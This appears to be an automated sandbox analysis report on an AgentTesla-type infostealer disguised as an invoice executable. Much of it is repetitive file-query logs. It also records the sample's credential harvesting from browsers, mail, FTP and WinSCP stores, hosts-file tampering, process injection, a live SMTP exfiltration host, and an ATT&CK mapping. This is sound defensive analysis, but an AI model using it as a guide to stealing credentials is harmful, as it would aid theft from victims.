            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

            Stealing of Sensitive Information

            Source: Yara match | File source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
            MITRE ATT&CK Matrix (the number in front of a technique is the count shown by the report for that technique; techniques without a number did not match)

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 211 Windows Management Instrumentation | 1 Scheduled Task/Job | 211 Process Injection | 1 File and Directory Permissions Modification | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | 1 Credentials in Registry | 114 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 3 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 13 Software Packing | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 680571 | Sample: INVOICE OUTSTANDING.exe | Startdate: 08/08/2022 | Architecture: WINDOWS | Score: 100

            Start
              Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 13 other signatures
              INVOICE OUTSTANDING.exe (started)
                Dropped: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe (PE32)
                Dropped: C:\Users\user\AppData\Local\...\tmp69D2.tmp (XML)
                Dropped: C:\Users\user\...\INVOICE OUTSTANDING.exe.log (ASCII)
                Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                RegSvcs.exe (started)
                  DNS/IP: mail.oceanskylogistics.in 43.255.154.57, 49763, 587 AS-26496-GO-DADDY-COM-LLCUS Singapore
                  Dropped: C:\Users\user\AppData\Roaming\...\kECjS.exe (PE32)
                  Dropped: C:\Windows\System32\drivers\etc\hosts (ASCII)
                  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures
                schtasks.exe (started)
                  conhost.exe (started)
                BackgroundTransferHost.exe (started)
              kECjS.exe (started)
                conhost.exe (started)
              kECjS.exe (started)
                conhost.exe (started)

            Source | Detection | Scanner | Label
            INVOICE OUTSTANDING.exe | 38% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
            INVOICE OUTSTANDING.exe | 100% | Avira | HEUR/AGEN.1235476
            INVOICE OUTSTANDING.exe | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 100% | Avira | HEUR/AGEN.1235476
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe | 38% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | 0% | Metadefender |
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | 0% | ReversingLabs |

            Source | Detection | Scanner | Label
            0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack | 100% | Avira | HEUR/AGEN.1235476
            14.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

            Source | Detection | Scanner | Label
            mail.oceanskylogistics.in | 2% | Virustotal |
            Source | Detection | Scanner | Label
            http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
            http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
            http://www.fontbureau.com.C | 0% | Avira URL Cloud | safe
            http://www.monotype.K | 0% | Avira URL Cloud | safe
            http://wITvjB.com | 0% | Avira URL Cloud | safe
            http://www.tiro.com | 0% | URL Reputation | safe
            http://www.fontbureau.comessed | 0% | URL Reputation | safe
            http://www.goodfont.co.kr | 0% | URL Reputation | safe
            http://www.carterandcone.com | 0% | URL Reputation | safe
            http://www.sajatypeworks.com | 0% | URL Reputation | safe
            http://www.typography.netD | 0% | URL Reputation | safe
            http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
